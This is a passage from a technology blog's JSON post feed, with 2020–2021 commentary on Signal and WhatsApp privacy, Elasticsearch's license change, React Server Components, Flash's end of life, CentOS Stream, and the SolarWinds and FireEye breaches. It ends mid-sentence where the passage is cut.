The difference lies in metadata: while the message content may be encrypted, WhatsApp collects extensive metadata about who you talk to, when, how often, and from where.\nSignal, by contrast, is designed to minimize metadata collection. The organization has been transparent about this, even publishing the minimal data they were able to provide in response to a grand jury subpoena: essentially just the date an account was created and the last connection time.\nAs someone who\u0026rsquo;s spent decades working with open-source tools, I find Signal\u0026rsquo;s architecture refreshingly principled. The Signal Protocol is available on GitHub. The server code is open source. The cryptographic design has been peer-reviewed by researchers at institutions like Oxford and MIT. This is how security software should be built: in the open, subject to scrutiny, with no proprietary black boxes hiding data collection. Privacy-critical systems should never be built in the shadows.\nThe Infrastructure Challenge # Of course, explosive growth brings engineering challenges. Signal experienced outages on January 15th as their infrastructure struggled to keep up with demand. For a small nonprofit going up against a platform with billions of users and Facebook\u0026rsquo;s engineering might, this is the real test.\nI\u0026rsquo;ve seen this pattern before in open-source projects that suddenly find mainstream adoption. The technology is often solid, but the operational side (scaling databases, provisioning servers, handling registration flows at 100x the normal rate) is where things get difficult. Signal uses a relatively straightforward server architecture, but no system is designed to handle this kind of growth overnight.\nThe good news is that Signal has some notable backers, including a $50 million loan from Brian Acton (WhatsApp\u0026rsquo;s co-founder, who left Facebook over, you guessed it, privacy disagreements). 
They\u0026rsquo;ve also been steadily improving their feature set, adding group calling, desktop support, and the kind of quality-of-life features that everyday users expect.\nThe Bigger Picture for Privacy-First Software # What\u0026rsquo;s happening with Signal represents something I\u0026rsquo;ve been hoping to see for years: mainstream users making active choices about privacy, not because of abstract principles, but because a specific company action crossed a line they could understand. \u0026ldquo;Share your data with Facebook or lose your messaging app\u0026rdquo; is a proposition clear enough to motivate action.\nThis matters for the broader software ecosystem. For too long, the assumption has been that users will tolerate any privacy trade-off in exchange for free services. The WhatsApp backlash suggests there\u0026rsquo;s a limit — and it creates space for privacy-respecting alternatives to gain traction in other categories too.\nMy Take # I switched to Signal years ago for sensitive conversations, and I\u0026rsquo;ve been gradually moving more of my communication there. What gives me optimism about this moment isn\u0026rsquo;t just the download numbers — it\u0026rsquo;s that people are actually having conversations about metadata, data sharing, and the real cost of \u0026ldquo;free\u0026rdquo; services. That\u0026rsquo;s a level of privacy literacy we badly need. The movement toward privacy-first tools and governance is one of the few encouraging trends in tech right now.\nThe real question is whether this translates into lasting change or whether it\u0026rsquo;s a momentary panic that fades once WhatsApp tweaks its messaging. History suggests most users eventually shrug and accept the new terms. 
But even if Signal retains only a fraction of its new users, it will have grown its base enormously — and proven that there\u0026rsquo;s genuine market demand for privacy-first communication tools.\nIf you haven\u0026rsquo;t tried Signal yet, now\u0026rsquo;s a good time. And if you\u0026rsquo;re building software, take note: users are paying attention to your privacy practices. That\u0026rsquo;s a trend I hope sticks around.\n","date":"21 January 2021","externalUrl":null,"permalink":"/posts/210121-signal-surge-whatsapp-privacy/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"WhatsApp’s updated privacy policy drives millions to Signal, highlighting the growing demand for privacy-respecting open-source alternatives.","title":"Signal's Explosive Growth — What WhatsApp's Privacy Blunder Means for Messaging","type":"posts"},{"content":"Elastic, the company behind Elasticsearch and Kibana, announced this week that they\u0026rsquo;re changing the license for both products from Apache 2.0 to a dual license under the Server Side Public License (SSPL) and the Elastic License. The move is directly aimed at Amazon Web Services, which offers Elasticsearch as a managed service (Amazon Elasticsearch Service) without contributing back to the project or paying Elastic for the privilege. This escalation in open-source licensing battles and the broader sustainability questions continue to shape how open-source projects balance community and commerce.\nThis is the latest escalation in an ongoing war between open-source companies and cloud providers, and it raises fundamental questions about the sustainability of open-source business models.\nThe Core Conflict # The tension is straightforward: Elastic creates Elasticsearch, invests millions in development, and open-sources it under a permissive license. AWS takes that code, wraps it in a managed service, and sells it to customers. 
AWS captures significant revenue from Elasticsearch without the development costs, while Elastic has to compete with its own product being sold by the world\u0026rsquo;s largest cloud provider.\nElastic CEO Shay Banon didn\u0026rsquo;t mince words in the announcement: \u0026ldquo;AWS and Amazon Elasticsearch Service. They have been doing things that we think are just NOT OK since 2015 and it has only gotten worse.\u0026rdquo;\nThis isn\u0026rsquo;t the first time we\u0026rsquo;ve seen this pattern. MongoDB moved to the SSPL in 2018 for similar reasons. Redis Labs changed licenses for certain modules. Cockroach Labs adopted the Business Source License. Each time, the motivation is the same: cloud providers are using permissive open-source licenses to build competing services without contributing to the projects they depend on. The developer community has responded directly when these dynamics become unsustainable, creating forks to reclaim open governance.\nWhat the SSPL Actually Means # The SSPL is based on the GNU AGPL but goes significantly further. The key provision: if you offer the software as a service, you must open-source the entire service stack — not just your modifications to the software, but all the management, orchestration, monitoring, and infrastructure code you use to deliver the service.\nThis is specifically designed to be impractical for cloud providers. AWS isn\u0026rsquo;t going to open-source its entire managed service infrastructure just to offer Elasticsearch. The SSPL effectively prevents cloud providers from offering the software as a service without a commercial agreement with Elastic.\nIt\u0026rsquo;s worth noting that the Open Source Initiative (OSI) does not consider the SSPL to be an open-source license. The SSPL\u0026rsquo;s requirements go beyond what the OSI\u0026rsquo;s Open Source Definition allows, which means Elasticsearch is, by the OSI\u0026rsquo;s definition, no longer open-source software. 
Elastic would argue that\u0026rsquo;s a technicality — the code is still publicly available, and the vast majority of users are unaffected by the license change. But definitions matter, and this distinction has real implications for organizations with open-source-only policies.\nThe AWS Perspective # It would be unfair not to acknowledge AWS\u0026rsquo;s position. Cloud providers argue that they\u0026rsquo;re doing exactly what open-source licenses allow — using and distributing software under the terms the creators chose. If Elastic didn\u0026rsquo;t want AWS to offer their software as a service, they shouldn\u0026rsquo;t have used the Apache 2.0 license.\nAWS has also pointed out that they do contribute to open-source projects and that the community benefits from the scale and accessibility that cloud services provide. Managed services lower the barrier to entry and bring more users to the ecosystem.\nThere\u0026rsquo;s some validity to this argument. I\u0026rsquo;ve seen plenty of organizations adopt Elasticsearch because they could get it as a managed AWS service without the operational overhead of running it themselves. Some of those organizations eventually became Elastic customers for premium features. The relationship between cloud services and open-source adoption isn\u0026rsquo;t purely extractive.\nThe Bigger Picture for Open Source # This license change is a symptom of a structural problem in the open-source ecosystem. The traditional model — build it open source, sell support and enterprise features — worked when the primary way to use software was to run it yourself. In the cloud era, the hyperscalers can offer a better operational experience than most vendors, and they have the scale to do it cheaply.\nI\u0026rsquo;ve been contributing to and using open-source software for most of my career, and I find this situation genuinely troubling. The open-source model has produced some of the most important software in history. 
But if the economics don\u0026rsquo;t work for the companies that invest in creating and maintaining that software, the model is at risk.\nSeveral approaches are being explored:\nSource-available licenses like the SSPL and BSL that restrict cloud provider usage while keeping the code public Open core models where the community edition is genuinely open source but premium features are proprietary Cloud-native licensing that specifically addresses the managed service use case Foundation-based governance where projects are maintained by a neutral foundation rather than a single company None of these are perfect. Source-available licenses fracture the open-source community. Open core can lead to artificial feature restrictions. Cloud-native licensing is legally untested. And foundation governance doesn\u0026rsquo;t solve the funding problem.\nWhat This Means for Users # If you\u0026rsquo;re using Elasticsearch in your organization, the practical impact depends on how you use it:\nSelf-hosted users: Virtually no impact. The SSPL only triggers if you\u0026rsquo;re offering Elasticsearch as a service to third parties. Running it internally for your own use is fine under both the SSPL and the Elastic License.\nAWS Elasticsearch Service users: The existing service isn\u0026rsquo;t going anywhere immediately, but Amazon may eventually need to fork the project or develop its own compatible implementation. There may be feature divergence over time.\nElastic Cloud users: No change — you\u0026rsquo;re already a paying Elastic customer.\nMy Take # I sympathize with Elastic\u0026rsquo;s position more than I\u0026rsquo;d like to. It genuinely is unfair for a cloud provider to take open-source software, offer it as a competing service, and capture most of the economic value. 
But I also think the SSPL is a flawed solution that creates confusion about what \u0026ldquo;open source\u0026rdquo; means and fragments the ecosystem.\nWhat I\u0026rsquo;d really like to see is the industry develop a new social contract around open source and cloud services. The cloud providers have built enormously profitable businesses on the back of open-source software, and they should be contributing back proportionally — whether through direct funding, meaningful code contributions, or licensing agreements. The tension between innovation speed and community governance reflects how critical open-source sustainability has become to the entire industry.\nUntil that happens, expect more license changes, more forks, and more tension. The open-source model that powered the last 25 years of software innovation needs an update for the cloud era. We just haven\u0026rsquo;t figured out what that update looks like yet.\nPart of the Developer Landscape series — because the code we write exists in an ecosystem shaped by business decisions.\n","date":"14 January 2021","externalUrl":null,"permalink":"/posts/210114-elasticsearch-license-change/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Elastic’s decision to move Elasticsearch and Kibana from Apache 2.0 to dual SSPL/Elastic License reignites the debate about open source sustainability in the cloud era.","title":"Elasticsearch Changes Its License — The Open Source vs. Cloud Provider Battle Heats Up","type":"posts"},{"content":"The React team ended 2020 with a bang: Dan Abramov and Lauren Tan presented React Server Components, a new experimental feature that allows React components to run exclusively on the server. The demo and accompanying RFC have sparked intense discussion across the JavaScript community, and after spending the holiday break digging into the details, I have some thoughts. 
This announcement comes as other frameworks like Angular were implementing their own modernization efforts with the Ivy compiler, showing an industry-wide push toward performance and developer experience improvements.\nThe core idea is simple: some components don\u0026rsquo;t need to be interactive. They just fetch data and render HTML. Why ship all that code — and all those dependencies — to the browser if the client never needs to execute it?\nHow Server Components Work # React Server Components introduce a new component type that executes only on the server. These components can directly access your database, file system, or internal APIs without exposing those capabilities or their dependencies to the client. The key innovation is that they integrate seamlessly with regular client-side React components in the same component tree.\nThe naming convention is straightforward: files ending in .server.js are Server Components, .client.js are Client Components, and plain .js files are shared. Server Components can render Client Components, but not vice versa (which makes sense — the server can produce markup that the client hydrates, but the client can\u0026rsquo;t execute server-only code).\nThe data fetching story is particularly compelling. Instead of the current pattern of useEffect → fetch → setState → re-render, or the more sophisticated solutions like React Query or SWR, Server Components can simply await data directly in the component body. No loading states, no waterfall fetches, no client-side caching complexity — the data is resolved on the server and streamed to the client as part of the rendered output.\nThe bundle size implications are significant. If a Server Component imports a heavy library — say, a Markdown parser or a date formatting library — that library never gets sent to the client. The demo showed an example where the notes app used a syntax highlighter and a date library, neither of which appeared in the client bundle. 
For applications that currently ship megabytes of JavaScript, this could be transformative.\nThe Good: Solving Real Problems # Let me be clear about what I think React Server Components get right.\nThe bundle size problem is real. Modern React applications ship an absurd amount of JavaScript to the browser. Bundle splitting and lazy loading help, but they add complexity and don\u0026rsquo;t solve the fundamental issue that many components exist only to fetch and display data. Server Components elegantly eliminate this category of unnecessary client-side code.\nData fetching in React has always been awkward. The component lifecycle doesn\u0026rsquo;t naturally align with data fetching patterns, and the community has produced dozens of solutions (Redux, MobX, React Query, SWR, Apollo, Relay) that each add their own complexity. Server Components offer a model where data fetching is just\u0026hellip; function calls. That\u0026rsquo;s refreshing.\nThe streaming architecture is smart. Server Components don\u0026rsquo;t return HTML — they return a serialized component tree that the client can merge with its existing state. This means the client can update parts of the UI from the server without losing client-side state like form inputs or scroll positions. It\u0026rsquo;s more sophisticated than traditional server-side rendering.\nThe Concerns: Complexity and Ecosystem Impact # That said, I have reservations.\nThe mental model is getting complicated. React developers now need to think about three types of components (Server, Client, Shared), understand serialization boundaries, know which hooks work where, and reason about a component tree that spans two execution environments. React\u0026rsquo;s original appeal was its simplicity — a component is a function that takes props and returns UI. We\u0026rsquo;re moving further from that simplicity with every new feature.\nThe ecosystem implications are enormous. 
Every React library, every component framework, every tutorial will need to be reconsidered in the context of Server Components. Which components should be server-only? Which libraries are \u0026ldquo;server-safe\u0026rdquo;? How do you test a component tree that spans client and server? The migration path for existing applications is unclear.\nIt tightens the coupling between frontend and backend. One of the benefits of the current SPA model is a clean separation between your API layer and your UI. Server Components blur this boundary by allowing components to directly access backend resources. For teams with separate frontend and backend developers, or organizations with microservice architectures, this coupling could be problematic.\nIt requires a compatible server runtime. You need a Node.js (or compatible) server that can execute React Server Components and stream results to the client. This moves React further from the \u0026ldquo;just drop a script tag in your HTML\u0026rdquo; simplicity and toward a full-stack framework requirement.\nComparison with Existing Approaches # It\u0026rsquo;s worth noting that server-rendered components aren\u0026rsquo;t a new idea. PHP, Ruby on Rails, and ASP.NET have been rendering HTML on the server for decades. More recently, frameworks like Next.js and Remix have brought server-side rendering back into the React ecosystem. The evolution of TypeScript has similarly enabled stronger type safety across the full stack, supporting both client and server-side development patterns.\nWhat makes React Server Components different is the granularity. Instead of rendering an entire page on the server and hydrating the whole thing on the client, you can mix server-rendered and client-rendered components at any level of your component tree. 
The server can render the data-heavy shell while the client handles the interactive widgets.\nThis is genuinely novel in the React ecosystem, and it could lead to applications that are both faster to load and more responsive to interact with — if the complexity can be managed.\nMy Take # I\u0026rsquo;ve been building web applications long enough to have lived through every paradigm shift — from server-rendered pages to AJAX to SPAs and now back toward the server. The pendulum swings, and each swing carries lessons from the previous one.\nReact Server Components feel like a necessary evolution. The current model of shipping entire applications as client-side JavaScript and then fetching all data through API calls has reached its limits. The bundle sizes are unsustainable, the loading waterfalls are painful, and the complexity of client-side state management has gotten out of hand. This pattern mirrors the larger industry shift we\u0026rsquo;ve seen with infrastructure-as-code and the recognition that full-stack thinking is necessary for modern applications.\nBut I worry about the execution. React is already a complex ecosystem, and Server Components add another dimension of complexity. The RFC is still experimental, and the final API could change significantly. My advice: understand the concepts, follow the development, but don\u0026rsquo;t rewrite your application yet.\nThe most exciting thing about Server Components might not be the feature itself, but what it signals about the direction of web development. The industry is collectively recognizing that we went too far with client-side-everything, and we\u0026rsquo;re finding smarter ways to leverage the server without going back to full page reloads. 
That\u0026rsquo;s progress.\nPart of the Developer Landscape series — tracking the shifts that shape how we build.\n","date":"7 January 2021","externalUrl":null,"permalink":"/posts/210107-react-server-components/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The React team’s introduction of Server Components promises zero-bundle-size components and direct backend access — but is it the right direction for frontend development?","title":"React Server Components — A Paradigm Shift or Just More Complexity?","type":"posts"},{"content":"Today, December 31, 2020, Adobe Flash Player officially reaches end of life. Adobe will stop distributing it, browsers have already removed or are removing support, and a technology that defined an entire era of the web will finally be laid to rest. After years of deprecation warnings and migration efforts, the plug is literally being pulled.\nI know Flash has been the punching bag of the web development community for the better part of a decade. But having worked through the era when Flash was genuinely revolutionary, I think it deserves a more nuanced farewell than most people are giving it.\nWhat Flash Actually Did for the Web # It\u0026rsquo;s easy to forget now, but in the late \u0026rsquo;90s and early 2000s, the web was boring. HTML 3.2 gave you tables, fonts, and not much else. JavaScript was a toy language that couldn\u0026rsquo;t reliably work across browsers. CSS was in its infancy. If you wanted rich interactivity, animation, audio, or video on the web, Flash was essentially your only option.\nFlash gave us YouTube before HTML5 video existed. It gave us web-based games, interactive learning platforms, and rich media experiences that simply weren\u0026rsquo;t possible with the native web stack. 
Entire categories of web applications — from video players to data visualization dashboards to interactive maps — were pioneered in Flash.\nMacromedia (later Adobe) Flash was also remarkably accessible to creators. The authoring environment combined a visual timeline editor with a progressively capable scripting language (ActionScript) that let designers create interactive content without being full-time programmers. It democratized rich media creation on the web in a way that nothing else did at the time.\nWhy It Had to Go # Of course, Flash had serious problems — and they only got worse as the web evolved.\nSecurity was perhaps the most damaging issue. Flash\u0026rsquo;s extensive capabilities meant an enormous attack surface, and Adobe struggled for years to keep up with the constant stream of zero-day vulnerabilities. For security-conscious organizations, Flash became a liability that was difficult to justify.\nPerformance was another persistent complaint. Flash content was notoriously CPU-hungry, drained laptop batteries, and could bring browsers to their knees. On mobile devices, the experience was even worse — which is partly what led to Steve Jobs\u0026rsquo; famous 2010 open letter \u0026ldquo;Thoughts on Flash\u0026rdquo;, declaring that iOS would never support it.\nProprietary control was the philosophical issue. Flash was a proprietary plugin owned by a single company, sitting as a black box inside the browser. Content inside Flash wasn\u0026rsquo;t indexable by search engines, wasn\u0026rsquo;t accessible to screen readers, and wasn\u0026rsquo;t part of the open web. As the web standards community gained momentum, this became increasingly untenable.\nThe rise of HTML5 ultimately made Flash unnecessary. 
The \u0026lt;video\u0026gt; and \u0026lt;audio\u0026gt; elements, Canvas, WebGL, CSS animations, and the maturation of JavaScript engines collectively replicated most of what Flash could do — natively, in the browser, without a plugin.\nThe Preservation Challenge # One thing that genuinely concerns me about Flash\u0026rsquo;s death is the preservation question. There\u0026rsquo;s an enormous body of creative work — games, animations, interactive art, educational content — that was built in Flash and is effectively going dark. The Internet Archive has been working to preserve Flash content using Ruffle, an open-source Flash emulator written in Rust, but the sheer volume of Flash content on the web means much of it will simply disappear.\nThis is a broader problem with proprietary formats and platforms. When the technology dies, the content dies with it. It\u0026rsquo;s a lesson worth remembering as we build increasingly complex web applications on today\u0026rsquo;s frameworks and platforms. What will happen to all our React apps in 20 years?\nLessons for Today\u0026rsquo;s Web Developers # Flash\u0026rsquo;s arc from revolution to revulsion teaches us a few things that are still relevant:\nOpen standards win in the long run. Proprietary technologies can move faster and deliver more impressive results in the short term, but open standards create a more resilient and interoperable ecosystem. The web standards process is slow and sometimes frustrating, but the result — a web that works everywhere, for everyone — is worth the wait.\nSecurity can\u0026rsquo;t be an afterthought. Flash\u0026rsquo;s security problems weren\u0026rsquo;t just bugs to be patched; they were architectural. The plugin model, with its broad system access and complex attack surface, was fundamentally difficult to secure. 
When you\u0026rsquo;re designing systems today, consider the security implications of your architectural choices, not just your implementation details.\nMobile changes everything. Flash\u0026rsquo;s inability to work well on mobile devices was a death sentence in a world that was rapidly going mobile-first. If your technology doesn\u0026rsquo;t work on the devices people actually use, it doesn\u0026rsquo;t matter how capable it is on the desktop.\nMy Take # I have a soft spot for Flash, and I\u0026rsquo;m not ashamed to admit it. I built some of my early interactive web projects with it, and there was a creative energy in the Flash community that I haven\u0026rsquo;t quite seen replicated since. Flash developers pushed the boundaries of what was possible on the web and, in doing so, helped define what the web needed to become.\nBut it was time. Flash\u0026rsquo;s security track record alone justified its retirement, and the modern web platform is genuinely more capable, more open, and more accessible than Flash ever was. The transition took longer than it should have — we\u0026rsquo;ve been talking about \u0026ldquo;killing Flash\u0026rdquo; since at least 2010 — but here we are.\nSo goodbye, Flash. Thanks for the games, the animations, the loading bars, and yes, even the security nightmares. The web you helped create has outgrown you, and that\u0026rsquo;s exactly as it should be.\nHappy New Year, everyone. 
Here\u0026rsquo;s to whatever the web becomes next.\n","date":"31 December 2020","externalUrl":null,"permalink":"/posts/201231-flash-end-of-life/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"As Adobe Flash reaches its official end of life on December 31, 2020, it’s worth reflecting on what it gave us and the lessons its rise and fall teach about web standards.","title":"Flash Is Finally Dead — Reflecting on a Technology That Shaped the Web","type":"posts"},{"content":"If you run production Linux servers — and statistically, you probably do — Red Hat just pulled the rug out from under a significant chunk of the ecosystem. Earlier this month, Red Hat announced that CentOS 8, which was supposed to be supported until 2029, will reach end-of-life at the end of 2021. Going forward, CentOS Stream will be the only CentOS — and it\u0026rsquo;s a fundamentally different product.\nFor those of us who\u0026rsquo;ve relied on CentOS as the free, stable, binary-compatible rebuild of Red Hat Enterprise Linux, this is a significant shift that deserves careful examination.\nWhat Changed and Why It Matters # CentOS has traditionally been a downstream rebuild of RHEL. Red Hat releases RHEL, and CentOS takes that source code and builds a free, community-supported version that\u0026rsquo;s essentially identical. It\u0026rsquo;s been the go-to choice for organizations that want RHEL compatibility without the subscription cost — from small startups to massive hosting providers.\nCentOS Stream, by contrast, is an upstream preview of RHEL. It sits between Fedora (the bleeding-edge community distro) and RHEL (the conservative enterprise release). Packages land in CentOS Stream before they go into RHEL, which means it\u0026rsquo;s a rolling preview of what RHEL will become, rather than a stable snapshot of what RHEL already is.\nThe practical difference is enormous. 
Classic CentOS was a known quantity — you could run it in production with confidence that it matched RHEL\u0026rsquo;s stability and patch cadence. CentOS Stream, while not unstable by any means, is a continuously evolving target. It\u0026rsquo;s closer to a development preview than a production platform.\nThe Community Response # The reaction has been swift and largely negative. The CentOS community has been vocal about feeling betrayed, and it\u0026rsquo;s not hard to see why. Organizations that chose CentOS 8 based on a 10-year support commitment are now facing a forced migration within a year.\nSeveral alternative projects have already emerged or announced their intentions:\nRocky Linux, announced by CentOS co-founder Gregory Kurtzer, aims to be a direct community-driven RHEL rebuild — essentially picking up where CentOS left off. CloudLinux has announced Project Lenix (now called AlmaLinux), another RHEL-compatible distribution backed by their commercial business. Both projects are in early stages, but the speed at which they\u0026rsquo;ve mobilized shows the depth of demand for a free RHEL rebuild and community-controlled alternatives to corporate-driven licensing changes.\nThe Business Logic # From Red Hat\u0026rsquo;s perspective, the move has a certain business logic. CentOS has long been a complicated asset for Red Hat. On one hand, it expanded the RHEL ecosystem and created a pipeline of users who might eventually become paying customers. On the other hand, it gave away essentially the same product for free, cannibalizing potential revenue.\nCentOS Stream serves Red Hat\u0026rsquo;s interests more directly: it creates a public testing ground for RHEL, gives the community a way to contribute to RHEL\u0026rsquo;s development, and removes the free production-ready alternative. 
If you want a stable, supported RHEL experience, you now need to pay for it.\nI understand the business reasoning, but I think it underestimates the goodwill that CentOS generated for the RHEL ecosystem. Many engineers learned Linux on CentOS, built their careers around it, and recommended RHEL to their employers precisely because they trusted the platform from their CentOS experience.\nPractical Migration Considerations # If you\u0026rsquo;re running CentOS 8 in production, you need to start planning now. Here\u0026rsquo;s my current thinking on the options:\nStay with CentOS Stream if your workloads are internal, you have solid testing pipelines, and you can tolerate the rolling update model. For development and staging environments, Stream is actually a decent choice.\nWait for Rocky Linux or AlmaLinux if you need strict RHEL binary compatibility for production workloads. Both projects look promising, but neither has shipped a stable release yet, so there\u0026rsquo;s inherent risk in committing to a project that hasn\u0026rsquo;t proven itself.\nMove to Ubuntu LTS if you\u0026rsquo;re not deeply invested in the RPM ecosystem and want a well-established alternative with long-term support. Canonical\u0026rsquo;s LTS model provides five years of standard support with optional extended security maintenance.\nConsider RHEL directly. Red Hat does offer free RHEL subscriptions for small production workloads and development use. The economics might work out better than you think, especially when you factor in the cost of maintaining your own CentOS alternative.\nEvaluate your cloud strategy. If you\u0026rsquo;re running in the cloud, consider whether you even need to care about the specific distro. Container-based workloads on managed Kubernetes, serverless functions, and platform services abstract away the OS layer entirely.\nMy Take # I\u0026rsquo;ve been running CentOS servers since the early days, and this decision genuinely stings. 
There was something reassuring about having a free, enterprise-grade Linux distribution that you could deploy anywhere with confidence. That era is ending.\nThat said, I think the Linux ecosystem will adapt. Rocky Linux and AlmaLinux will likely fill the gap, and the competition between them might actually result in something better than what we had before. Open source has a way of routing around obstacles.\nWhat concerns me more is the precedent. Red Hat is owned by IBM now, and this decision feels like the kind of move a large corporation makes when it prioritizes revenue capture over community goodwill. I hope this doesn\u0026rsquo;t signal a broader shift in how Red Hat engages with the open-source community, but I\u0026rsquo;m watching carefully.\nFor now, my advice is pragmatic: don\u0026rsquo;t panic, but don\u0026rsquo;t ignore this either. Start evaluating your options, test alternatives, and have a migration plan ready. The end of 2021 will come faster than you think.\nPart of my Infrastructure Notes series, where reality keeps rearranging the furniture.\n","date":"24 December 2020","externalUrl":null,"permalink":"/posts/201224-centos-stream-shift/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Red Hat’s decision to shift CentOS from a stable downstream rebuild to a rolling upstream preview has sent shockwaves through the server community.","title":"CentOS Is Dead, Long Live CentOS Stream — What Now for Enterprise Linux?","type":"posts"},{"content":"The news that broke this week about the SolarWinds Orion compromise is, without exaggeration, one of the most significant cybersecurity events I\u0026rsquo;ve seen in my three decades of working in technology. Attackers — believed to be state-sponsored — managed to inject malicious code into SolarWinds\u0026rsquo; Orion platform build process, which then got distributed to roughly 18,000 organizations via routine software updates. 
Among the victims: US government agencies, Fortune 500 companies, and FireEye itself, which is how this was discovered in the first place. This incident would later be followed by the White House convening the open source security summit to address systemic vulnerabilities in software supply chains.\nThis isn\u0026rsquo;t just another breach. This is an attack on the software supply chain — and it strikes at the very foundation of trust that our industry relies on. The supply chain security evolution that followed would address many of these gaps.\nWhat Actually Happened # The attackers compromised SolarWinds\u0026rsquo; build pipeline. They inserted a backdoor — now dubbed SUNBURST — into the Orion software updates distributed between March and June 2020. That means this malicious code sat inside thousands of networks for months before anyone noticed.\nThe sophistication is remarkable. The malware was designed to mimic legitimate SolarWinds activity, used steganography to hide its communications, and included checks to avoid running in sandboxes or analysis environments. It would lie dormant for up to two weeks before activating. This wasn\u0026rsquo;t a smash-and-grab — it was a carefully planned, long-duration infiltration.\nThe SUNBURST backdoor communicated with command-and-control servers using DNS queries that looked like normal Orion telemetry. The subdomains encoded information about the victim\u0026rsquo;s environment, and the attackers could then selectively decide which targets to pursue further. It\u0026rsquo;s the kind of operation that requires immense patience and resources.\nThe Build Pipeline Is the New Attack Surface # What keeps me up at night about this isn\u0026rsquo;t just the scale — it\u0026rsquo;s the vector. The attackers didn\u0026rsquo;t break into each of those 18,000 organizations individually. 
They compromised the build system of a trusted vendor, and the victims essentially installed the backdoor themselves.\nThink about your own CI/CD pipeline for a moment. How many third-party dependencies does your build process pull in? How many build tools, plugins, and packages are involved? Do you verify the integrity of every artifact at every stage? I\u0026rsquo;m willing to bet most of us don\u0026rsquo;t — not thoroughly, anyway.\nI\u0026rsquo;ve been building software since the early \u0026rsquo;90s, and for most of that time, supply chain security was barely on anyone\u0026rsquo;s radar. We trusted our compilers, our package managers, our vendors. Ken Thompson warned us about this in his 1984 Turing Award lecture \u0026ldquo;Reflections on Trusting Trust\u0026rdquo;, and yet here we are, 36 years later, learning the lesson the hard way. Other major incidents like faker.js and colors.js would underscore how fragile our dependency chains really are.\nWhat This Means for Development Teams # If you\u0026rsquo;re running a development team right now, this should trigger some immediate actions:\nAudit your supply chain. Map out every external dependency in your build and deployment process. This isn\u0026rsquo;t just npm packages or Maven artifacts — it includes your CI/CD tooling, your infrastructure management platforms, your monitoring solutions. SolarWinds Orion is a network monitoring tool. It had privileged access by design.\nVerify build integrity. Implement reproducible builds where possible. Sign your artifacts. Compare checksums. If you\u0026rsquo;re using a package manager, enable lock files and verify package signatures. Consider tools like in-toto for supply chain integrity verification. SLSA frameworks would formalize these practices.\nLimit blast radius. Apply the principle of least privilege aggressively. Your monitoring tool shouldn\u0026rsquo;t have domain admin access. Your CI runner shouldn\u0026rsquo;t have production database credentials. 
Segment your networks so that a compromise of one system doesn\u0026rsquo;t automatically grant access to everything.\nMonitor egress traffic. Many organizations focus their security monitoring on inbound threats. The SUNBURST backdoor communicated outbound via DNS — a channel that many firewalls allow through unrestricted. Later security incidents reinforced the importance of egress monitoring. DNS monitoring and anomaly detection should be part of your security posture.\nThe Vendor Trust Problem # Open source supply chain incidents would continue to highlight vendor trust challenges.\nThere\u0026rsquo;s a deeper philosophical issue here that our industry needs to reckon with. We operate in an ecosystem built on layers of trust. I trust my OS vendor, my cloud provider, my SaaS tools, my open-source dependencies. Each of those trust relationships is a potential link in a chain that can be exploited.\nThe uncomfortable truth is that there\u0026rsquo;s no complete solution to this problem. You can\u0026rsquo;t audit every line of code in every dependency and every vendor\u0026rsquo;s build system. But you can be more deliberate about where you place trust and what access you grant.\nZero-trust architecture isn\u0026rsquo;t just a buzzword — events like this give it real urgency. The assumption should be that any component could be compromised, and your architecture should be designed to detect and contain the damage when that happens.\nMy Take # I\u0026rsquo;ve been in this industry long enough to have seen plenty of \u0026ldquo;this changes everything\u0026rdquo; moments that didn\u0026rsquo;t actually change much. But this one feels different. The SolarWinds attack exposes a systemic vulnerability in how the entire software industry operates.\nThe fact that a routine software update from a trusted vendor was the attack vector — that\u0026rsquo;s the nightmare scenario we\u0026rsquo;ve been warned about for years. 
And the attacker\u0026rsquo;s tradecraft was good enough that it went undetected for nine months.\nWhat worries me most is that this might not be an isolated incident. If one build pipeline was compromised, how many others might be? We only know about this one because FireEye had the sophistication to detect it and the transparency to disclose it.\nAs developers and infrastructure engineers, we need to take supply chain security seriously — not as an abstract concern, but as an operational reality. That means investing in build integrity, minimizing trust boundaries, and building detection capabilities that assume breach rather than hoping for prevention.\nThe software we build is only as trustworthy as the weakest link in its supply chain. After this week, that\u0026rsquo;s a lesson none of us can afford to ignore.\nThis is part of my ongoing series on security in practice — because theory doesn\u0026rsquo;t stop nation-state actors.\n","date":"17 December 2020","externalUrl":null,"permalink":"/posts/201217-solarwinds-supply-chain-attack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The SolarWinds supply chain attack is a watershed moment for software security — and it has profound implications for how we build, ship, and trust code.","title":"SolarWinds Hack — Why Supply Chain Attacks Should Terrify Every Developer","type":"posts"},{"content":"FireEye, one of the most prominent cybersecurity firms in the world, disclosed this week that it was breached by what it describes as a \u0026ldquo;highly sophisticated state-sponsored adversary.\u0026rdquo; The attackers made off with FireEye\u0026rsquo;s proprietary red team tools — the same arsenal the company uses to test its clients\u0026rsquo; defenses. If you work in security, or if your organization uses FireEye\u0026rsquo;s tools or services, this is a significant event. 
But even if you don\u0026rsquo;t, this breach carries lessons worth understanding.\nWhat Was Stolen # FireEye\u0026rsquo;s red team tools are essentially an offensive toolkit — software designed to simulate real-world attacks against networks, applications, and infrastructure. Think of them as a professionally maintained, well-documented collection of exploitation techniques. Red team engagements are a standard part of security assessment: you hire experts to attack your organization using the same techniques real adversaries would use, then fix whatever they find.\nWhen these tools are in the hands of a defensive security company operating under strict rules of engagement, they\u0026rsquo;re a force for improving security. When they\u0026rsquo;re in the hands of actual adversaries, they\u0026rsquo;re weapons. The stolen tools reportedly include scripts, custom implants, and frameworks for exploiting known vulnerabilities — not zero-days, according to FireEye, but sophisticated implementations of known techniques.\nFireEye has taken the unusual step of publishing countermeasures — detection signatures, YARA rules, and Snort rules — that organizations can use to detect if the stolen tools are being used against them. This is the right move, and credit to FireEye for the transparency.\nWhy This Matters Beyond FireEye # Security tools in adversarial hands are a recurring nightmare for the industry. The precedent everyone remembers is the Shadow Brokers leak of NSA tools in 2017, which included EternalBlue — the exploit that powered ransomware outbreaks. This class of supply chain weaponization has continued with tools and access being the primary targets.\nThe FireEye tool theft is different in scale (these aren\u0026rsquo;t zero-day exploits for unpatched vulnerabilities) but the dynamic is similar. The tools lower the barrier for 